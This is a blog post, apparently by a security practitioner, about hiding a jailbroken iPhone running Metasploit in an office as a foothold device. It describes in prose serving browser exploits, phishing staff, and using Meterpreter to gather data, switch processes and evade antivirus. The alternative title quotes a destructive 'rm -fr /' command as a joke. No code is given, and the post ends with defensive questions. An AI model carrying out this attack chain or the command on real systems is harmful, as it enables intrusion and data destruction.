Of iPhones and Wifi

Alternative Title: If I “rm -fr /” my iPhone, does Steve Jobs kill a kitten ?

Setup.

So I haven’t had a chance to really get “hands on” with this simply because I have zero free time at the moment so bare with me on this one.

We all know at least one annoying person with an Apple iPhone right. I know, I am that annoying person with an iPhone. They really have changed the game entirely when it comes not only to mobile handsets, but also mobile PC’s that can be placed within an environment and used as a device to pivot or maintain your foothold on that network.

Next.

Right, we have our iPhone (or I guess even your iPod touch, but I haven’t played with one of those), it has wireless. It has a nifty little power cable (or at least mine does) that’s pretty small and can be used to power the device from under a desk, in a random closet somewhere nearby or in that cable tray with a stray power box. What does that mean to you and I ? Right now ? Not much. But jailbreak the phone, stick on OpenSSH (or simply enable it in my case) and hey..what’s that ? Metasploit ?? No..surely not. Yes, ladies and gentlemen, you now have Metasploit installed and running from your iPhone. Think about that for a second. Let it really sink in.

Next.

So are you with me so far ? We have a very small device, with fairly decent WiFi capability that has the ability to stay on until such time as it’s found or the attacker decides to come back and pick it up. What can an attacker do with this ? Well, they could run any one (or many) of the built in web browser exploits and just wait. This would allow the attacker to spam anyone within the target business (anyone for a spot of spear whaling ?) and no doubt get at least one machine compromised on the network. How is this useful to the attacker ?

1. We have a remote shell on a compromised machine within the target network.

2. We could now use Meterpreter to maintain access and harvest as much information on that network as is physically possible. Believe me, this is a scary amount of information.

3. With that compromised host and the information gleaned from it, we can now deepen the foothold we have on the organization.

Next.

All of this is very scary. I’ve been experimenting with Metasploit and Meterpreter and I can say that it’s trivial to exploit the older versions of Internet Explorer. That’s one thing, but add to this the post exploitation bliss that is Meterpreter and you have a very nasty combination. The WinEnum script by Dark0perator pulls in so much useful information from the victim machine it becomes even more trivial to start building very comprehensive maps and other useful information on the target network. And the ringer ? Meterpreter runs completely from memory. It’s not going to be detected by Anti-Virus either. Fine, I will see the broken IE process and kill it ! Wrong, simply migrate the Meterpreter process from IE to something a little less suspect with the Migrate script. Beige coloured mold could do this stuff….

Done.

Yes, we’re done. We have an extremely portable device that can be used to leverage a foot hold into a target network and then not only maintain but increase that foothold. What does this mean to security professionals ? It means the attack surface is growing and generally there isn’t anything we can do about it. Why ? Have you ever tried to tell your C-level exec to switch off the WiFi on his handset ? You’re going to have another vector to worry about and it’s going to be the biggest worry of them all.

To sum it all up, end point security is tough. Very tough. But hopefully this post will do one thing (and hopefully it’s not make me look like an insane ranting person) and that’s get the thought processes going on what we can do. What policies and procedures can we implement to at least mitigate these issues ? Can we separate these devices off into their own networks ? Is this even viable in your environment ?

Unfortunately I don’t have any of the answers for this. I probably only have more questions, but to me, that’s what this is about. Asking the right questions to at least get to the answers.